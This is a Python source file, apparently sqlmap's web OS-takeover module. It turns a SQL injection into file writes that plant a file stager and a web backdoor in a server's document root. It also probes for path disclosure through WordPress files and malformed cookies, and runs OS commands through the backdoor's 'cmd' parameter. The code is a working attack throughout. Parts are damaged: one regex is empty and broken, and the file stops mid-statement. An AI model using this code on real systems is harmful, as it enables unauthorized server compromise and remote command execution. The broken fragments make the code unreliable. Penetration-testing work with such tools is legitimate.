#!/usr/bin/env python """ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ import os import posixpath import re import StringIO import tempfile import urlparse from extra.cloak.cloak import decloak from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend from lib.core.common import extractRegexResult from lib.core.common import getAutoDirectories from lib.core.common import getManualDirectories from lib.core.common import getPublicTypeMembers from lib.core.common import getSQLSnippet from lib.core.common import getUnicode from lib.core.common import ntToPosixSlashes from lib.core.common import isTechniqueAvailable from lib.core.common import isWindowsDriveLetterPath from lib.core.common import normalizePath from lib.core.common import parseFilePaths from lib.core.common import posixToNtSlashes from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import singleTimeWarnMessage from lib.core.convert import hexencode from lib.core.convert import utf8encode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import DBMS from lib.core.enums import HTTP_HEADER from lib.core.enums import OS from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.enums import WEB_API from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT from lib.core.settings import EVENTVALIDATION_REGEX from lib.core.settings import SHELL_RUNCMD_EXE_TAG from lib.core.settings import SHELL_WRITABLE_DIR_TAG from lib.core.settings import VIEWSTATE_REGEX from lib.request.connect import Connect as Request from thirdparty.oset.pyoset import oset class Web: """ This class defines web-oriented OS takeover functionalities for plugins. """ def __init__(self): self.webApi = None self.webBaseUrl = None self.webBackdoorUrl = None self.webBackdoorFilePath = None self.webStagerUrl = None self.webStagerFilePath = None self.webDirectory = None def webBackdoorRunCmd(self, cmd): if self.webBackdoorUrl is None: return output = None if not cmd: cmd = conf.osCmd cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd) page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT) if page is not None: output = re.search(r"
", page, re.I | re.S) if output: output = output.group(1) return output def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None): if filepath is not None: if filepath.endswith('_'): content = decloak(filepath) # cloaked file else: with open(filepath, "rb") as f: content = f.read() if content is not None: stream = StringIO.StringIO(content) # string content return self._webFileStreamUpload(stream, destFileName, directory) def _webFileStreamUpload(self, stream, destFileName, directory): stream.seek(0) # Rewind try: setattr(stream, "name", destFileName) except TypeError: pass if self.webApi in getPublicTypeMembers(WEB_API, True): multipartParams = { "upload": "1", "file": stream, "uploadDir": directory, } if self.webApi == WEB_API.ASPX: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False) if "File uploaded" not in page: warnMsg = "unable to upload the file through the web file " warnMsg += "stager to '%s'" % directory logger.warn(warnMsg) return False else: return True else: logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi) return False def _webFileInject(self, fileContent, fileName, directory): outFile = posixpath.join(ntToPosixSlashes(directory), fileName) uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) query = "" if isTechniqueAvailable(kb.technique): where = kb.injection.data[kb.technique].where if where == PAYLOAD.WHERE.NEGATIVE: randInt = randomInt() query += "OR %d=%d " % (randInt, randInt) query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding)) query = agent.prefixQuery(query) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) page = Request.queryPage(payload) return page def webInit(self): """ This method is used to write a web backdoor (agent) on a writable remote directory within the web server document root. """ if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: return self.checkDbmsOs() default = None choices = list(getPublicTypeMembers(WEB_API, True)) for ext in choices: if conf.url.endswith(ext): default = ext break if not default: default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP message = "which web application language does the web server " message += "support?\n" for count in xrange(len(choices)): ext = choices[count] message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) if default == ext: default = count + 1 message = message[:-1] while True: choice = readInput(message, default=str(default)) if not choice.isdigit(): logger.warn("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > len(choices): logger.warn("invalid value, it must be between 1 and %d" % len(choices)) else: self.webApi = choices[int(choice) - 1] break if not kb.absFilePaths: message = "do you want sqlmap to further try to " message += "provoke the full path disclosure? [Y/n] " if readInput(message, default='Y', boolean=True): headers = {} been = set([conf.url]) for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") if url not in been: try: page, _, _ = Request.getPage(url=url, raise404=False, silent=True) parseFilePaths(page) except: pass finally: been.add(url) url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url) if url not in been: try: page, _, _ = Request.getPage(url=url, raise404=False, silent=True) parseFilePaths(page) except: pass finally: been.add(url) for place in (PLACE.GET, PLACE.POST): if place in conf.parameters: value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place]) if "[]" in value: page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) cookie = None if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] elif headers and HTTP_HEADER.SET_COOKIE in headers: cookie = headers[HTTP_HEADER.SET_COOKIE] if cookie: value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) if value != cookie: page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie) if value != cookie: page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) directories = list(arrayizeValue(getManualDirectories())) directories.extend(getAutoDirectories()) directories = list(oset(directories)) path = urlparse.urlparse(conf.url).path or '/' if path != '/': _ = [] for directory in directories: _.append(directory) if not directory.endswith(path): _.append("%s/%s" % (directory.rstrip('/'), path.strip('/'))) directories = _ backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webApi)) stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi)) for directory in directories: if not directory: continue stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) uploaded = False directory = ntToPosixSlashes(normalizePath(directory)) if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'): directory = "/%s" % directory if not directory.endswith('/'): directory += '/' # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method infoMsg = "trying to upload the file stager on '%s' " % directory infoMsg += "via LIMIT 'LINES TERMINATED BY' method" logger.info(infoMsg) self._webFileInject(stagerContent, stagerName, directory) for match in re.finditer('/', directory): self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName) debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl logger.debug(debugMsg) uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage = uplPage or "" if "sqlmap file uploader" in uplPage: uploaded = True break # Fall-back to UNION queries file upload method if not uploaded: warnMsg = "unable to upload the file stager " warnMsg += "on '%s'" % directory singleTimeWarnMessage(warnMsg) if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): infoMsg = "trying to upload the file stager on '%s' " % directory infoMsg += "via UNION method" logger.info(infoMsg) stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) handle, filename = tempfile.mkstemp() os.close(handle) with open(filename, "w+b") as f: _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi)) _ = _.replace(SHELL_WRITABLE_DIR_TAG, utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) f.write(_) self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True) for match in re.finditer('/', directory): self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/')) self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName) debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl logger.debug(debugMsg) uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage = uplPage or "" if "sqlmap file uploader" in uplPage: uploaded = True break if not uploaded: continue if "<%" in uplPage or "